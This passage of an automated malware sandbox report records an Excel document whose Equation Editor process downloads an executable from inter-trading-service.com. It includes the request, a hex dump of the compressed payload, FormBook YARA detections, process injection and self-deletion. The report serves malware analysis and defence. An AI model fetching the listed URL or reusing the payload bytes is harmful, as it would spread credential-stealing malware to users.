                                                                     Aug 3, 2021 19:48:49.214534044 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.215810061 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.215857983 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.215893984 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.217226028 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.217253923 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.217286110 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.217309952 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.218938112 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.218966007 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.218991995 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.219016075 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.219033957 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.219048023 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.219058037 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.219068050 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.219072104 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.219077110 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.219083071 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.219098091 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.219100952 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.219111919 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.219149113 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.222286940 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.223342896 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.223385096 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.223419905 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.223427057 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.223442078 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.223453999 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.223464966 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.223495007 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.226684093 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.229032993 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.234457970 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.234571934 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.240442038 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.240483999 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.240613937 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.240614891 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.240684032 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.242337942 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.242378950 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.242410898 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.242439985 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.243297100 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.243325949 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.243381023 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.243408918 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.243408918 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.243426085 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.243446112 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.243446112 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.243485928 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.243494987 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.243541002 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.244494915 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245321035 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245352983 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245381117 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245394945 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245403051 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245413065 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245417118 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245429039 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245434046 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245452881 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245470047 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245472908 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245481968 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.245505095 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.245512962 CEST  80           49165      160.153.129.234  192.168.2.22

                                                                    UDP Packets

                                                                     Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                                     Aug 3, 2021 19:48:49.033301115 CEST  52197        53         192.168.2.22     8.8.8.8
                                                                     Aug 3, 2021 19:48:49.071100950 CEST  53           52197      8.8.8.8          192.168.2.22
                                                                     Aug 3, 2021 19:48:49.071474075 CEST  52197        53         192.168.2.22     8.8.8.8
                                                                     Aug 3, 2021 19:48:49.106981993 CEST  53           52197      8.8.8.8          192.168.2.22

                                                                    DNS Queries

                                                                     Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                       Type            Class
                                                                     Aug 3, 2021 19:48:49.033301115 CEST  192.168.2.22  8.8.8.8  0xb648    Standard query (0)  inter-trading-service.com  A (IP address)  IN (0x0001)
                                                                     Aug 3, 2021 19:48:49.071474075 CEST  192.168.2.22  8.8.8.8  0xb648    Standard query (0)  inter-trading-service.com  A (IP address)  IN (0x0001)

                                                                    DNS Answers

                                                                     Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                       CName  Address          Type            Class
                                                                     Aug 3, 2021 19:48:49.071100950 CEST  8.8.8.8    192.168.2.22  0xb648    No error (0)  inter-trading-service.com         160.153.129.234  A (IP address)  IN (0x0001)
                                                                     Aug 3, 2021 19:48:49.106981993 CEST  8.8.8.8    192.168.2.22  0xb648    No error (0)  inter-trading-service.com         160.153.129.234  A (IP address)  IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • inter-trading-service.com

                                                                    HTTP Packets

                                                                     Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                                     0           192.168.2.22  49165        160.153.129.234  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                     Timestamp                            kBytes transferred  Direction  Data
                                                                     Aug 3, 2021 19:48:49.153964043 CEST  0                   OUT        GET /Di4/New_1007572_021.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: inter-trading-service.com
                                                                    Connection: Keep-Alive
                                                                     Aug 3, 2021 19:48:49.187442064 CEST  2                   IN         HTTP/1.1 200 OK
                                                                    Date: Tue, 03 Aug 2021 17:48:49 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, Keep-Alive
                                                                    Last-Modified: Mon, 02 Aug 2021 22:35:37 GMT
                                                                    ETag: "870006b-6f200-5c89b30292d99-gzip"
                                                                    Accept-Ranges: bytes
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: application/x-msdownload
                                                                     Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fc 77 20 d5 ef fb 00 0e 9f 63 ef bd 57 07 d9 eb 2c c7 39 48 56 64 cb 96 d5 99 46 56 36 21 45 25 21 33 8a 94 99 d0 94 95 0a 19 51 54 4a 85 86 4d a5 34 48 25 f2 bb 5f 87 ea fd fe 7c 3e df df f3 fc f5 fc f5 a8 73 9d 7b 5c f7 75 5f f7 b5 ef d7 4b d9 ec ce 82 31 c2 60 30 26 f0 59 5f 87 c1 9a 61 1b 3f 86 b0 ff cf 3f 49 e0 c3 b3 e5 06 0f ec 3a fb 80 6c 33 dc 7a 40 d6 c9 cf 3f 1c 11 1a 16 e2 1b 46 0c 42 90 89 c1 c1 21 11 08 12 15 11 16 19 8c f0 0f 46 98 da 39 22 82 42 28 54 4d 6e 6e 8e ad 9b 34 ec 77 c0 60 d6 70 46 58 50 b8 ca d8 6f ba e3 30 1e 38 27 1c 09 83 55 b1 c0 60 96 1b 63 99 dd a0 8d 80 26 59 36 b8 83 da 0c 1b 7c c3 60 7f bf 61 7b 58 e9 e3 30 fa b4 e1 61 18 8c 8f fe f7 ef f7 9f af 8d 73 02 ba 56 b0 0d ba 4b 66 ff e3 90 86 ac 30 ae ff 2f 64 f1 5f 3f 80 3f b6 7f 74 d9 40 7f e7 3f fa 9a 11 d4 98 08 f0 9d 57 b9 79 2e e8 ac 0c ff 45 62 8f 66 58 78 18 19 b4 e9 bc 41 67 87 88 54 b3 fc 9b 45 f0 57 33 8c 1a 18 02 10 b9 36 79 a6 d3 fa f4 5f 78 c6 ff c9 66 68 f7 06 0e 44 96 01 c6 0c 4b d2 87 c1 d2 d5 61 74 9b 00 5f 2c 5c fe e0 db 93 e5 3f 97 fd 9f 3f 82 48 46 98 01 f8 86 c3 60 fc 0c ca 00 72 40 87 83 25 0a 03 15 e9 f2 82 96 22 9e 19 40 fc f8 fa fa fa 2f c0 ec 0e 80 02 a3 8f 40 68 0c ca 40 8f 2c f4 a6 2a 90 51 38 58 c0 12 02 4e c2 a1 0a d1 4d d8 a4 8b 0f 02 0d fa 62 e8 90 1e bf 09 b8 40 04 f6 03 04 26 65 56 88 0a 07 34 48 9f 91 82 66 18 95 19 ff 70 03 04 c5 44 b8 0d 58 50 c4 5f 07 70 63 15 61 04 34 11 10 3f 89 68 88 db 12 fa 7c 1e 80 aa 8c ba d0 1c fe d2 3a e4 22 e0 8c 4c c0 46 37 79 29 f8 cd 0b d3 26 1f c7 c0 27 18 7c f8 ff 1c 4a 44 99 07 e2 e7 0a d4 16 85 4e c8 81 57 82 da 0c bf 58 c0 01 58 c2 c1 2a 0e 65 6e d0 da 60 ce 0a e2 e5 22 7d f3 72 88 39 84 38 c0 42 30 83 dd c2 59 20 4c 0e 08 93 ce 66 04 c4 66 32 1d 33 16 c2 0c 03 a3 a1 ca 5c d0 66 67 a1 be 32 1b d4 14 86 f6 da 98 e2 84 96 42 42 c3 db 40 f3 72 a0 65 04 40 92 51 38 2b 44 99 1d 9a 86 34 ff 0b 30 8c 57 84 4e ae 98 08 39 99 d0 2f 38 d0 87 04 bd ad 0a 53 fd 05 10 43 d8 20 b5 6c b4 a1 85 a0 ad 0b b5 7f b1 c3 61 10 8b ff ea 73 fe 47 9f eb df fd 10 ee ff 98 e7 f9 8f 3e 2f bd 0f c9 3d fe b7 6d 85 81 35 a1 09 80 59 a6 4d cb 11 01 cc 87 ed 80 4e 29 0a 5a 09 4c 7f 67 e8 56 48 17 d8 5e 48 b4 ff b0 c2 c6 df 56 c8 b0 a9 3c 96 df 4a 53 65 50 16 fe a3 11 79 68 d9 30 5d ce 0f 00 84 f8 d0 86 d3 5d 8c 9f 4e 97 2e 2e d8 6f 43 60 d9 a4 05 59 c6 10 f8 78 81 4f 0b f8 6c f9 4d 1b 6f 0e 00 5d ce 89 d2 90 06 ef d1 29 b7 03 98 08 84 ca a4 a0 db 0e 71 48 d7 53 a2 02 84 70 81 8e 00 a9 94 1f ae 0b 99 35 02 32 36 7c ce c6 00 fd 24 7c d0 e8 1b 40 53 99 0f b2 2f 04 fd 08 88 25 c0 1d 1d 6c 58 0e 3f 24 08 3a ba 2b 7d a9 a8 bb 20 1c 0f 11 67 08 11 80 e6 25 c0 89 05 e1 1b 67 16 85 36 46 d2 37 86 0c 41 59 10 20 00 83 e5 87 0c 56 08 42 96 84 6c 2b 01 62 1a d8 0e d3 2f 16 15 68 06 c8 8c 43 21 09 3a 45 b8 08 d4 14 55 06 be c7 a2 a0 2c
                                                                    Data Ascii: 1faaw cW,9HVdFV6!E%!3QTJM4H%_|>s{\u_K1`0&Y_a??I:l3z@?FB!F9"B(TMnn4w`pFXPo08'U`c&Y6|`a{X0asVKf0/d_??t@?Wy.EbfXxAgTEW36y_xfhDKat_,\??HF`r@%"@/@h@,*Q8XNMb@&eV4HfpDXP_pca4?h|:"LF7y)&'|JDNWXX*en`"}r98B0Y Lff23\fg2BB@re@Q8+D40WN9/8SC lasG>/=m5YMN)ZLgVH^HV<JSePyh0]]N..oC`YxOlMo])qHSp526|$|@S/%lX?$:+} g%g6F7AY VBl+b/hC!:EU,


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    System Behavior

General

Start time: 19:48:42
Start date: 03/08/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Imagebase: 0x13f720000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:48:44
Start date: 03/08/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Reputation: high

General

Start time: 19:48:46
Start date: 03/08/2021
Path: C:\Users\Public\tynex.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\tynex.exe
Imagebase: 0x11a0000
File size: 455168 bytes
MD5 hash: 41137FD61B9CC0D92225C91660A5902C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 28%, ReversingLabs
Reputation: low

General

Start time: 19:49:15
Start date: 03/08/2021
Path: C:\Users\user\AppData\Local\Temp\tynex.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\tynex.exe
Imagebase: 0x380000
File size: 455168 bytes
MD5 hash: 41137FD61B9CC0D92225C91660A5902C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 28%, ReversingLabs
Reputation: low

General

Start time: 19:49:16
Start date: 03/08/2021
Path: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
Imagebase: 0x400000
File size: 3072 bytes
MD5 hash: 74BAFB3E707C7B0C63938AC200F99C7F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 5%, Metadefender
• Detection: 2%, ReversingLabs
Reputation: moderate

General

Start time: 19:49:17
Start date: 03/08/2021
Path: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
Imagebase: 0x1340000
File size: 186368 bytes
MD5 hash: 48ECE2CA39A9EAE7FCED7418CF071D46
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 49%, Metadefender
• Detection: 86%, ReversingLabs
Reputation: low

General

Start time: 19:49:19
Start date: 03/08/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:49:39
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cscript.exe
Imagebase: 0xd00000
File size: 126976 bytes
MD5 hash: A3A35EE79C64A640152B3113E6E254E2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 19:49:43
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
Imagebase: 0x49de0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
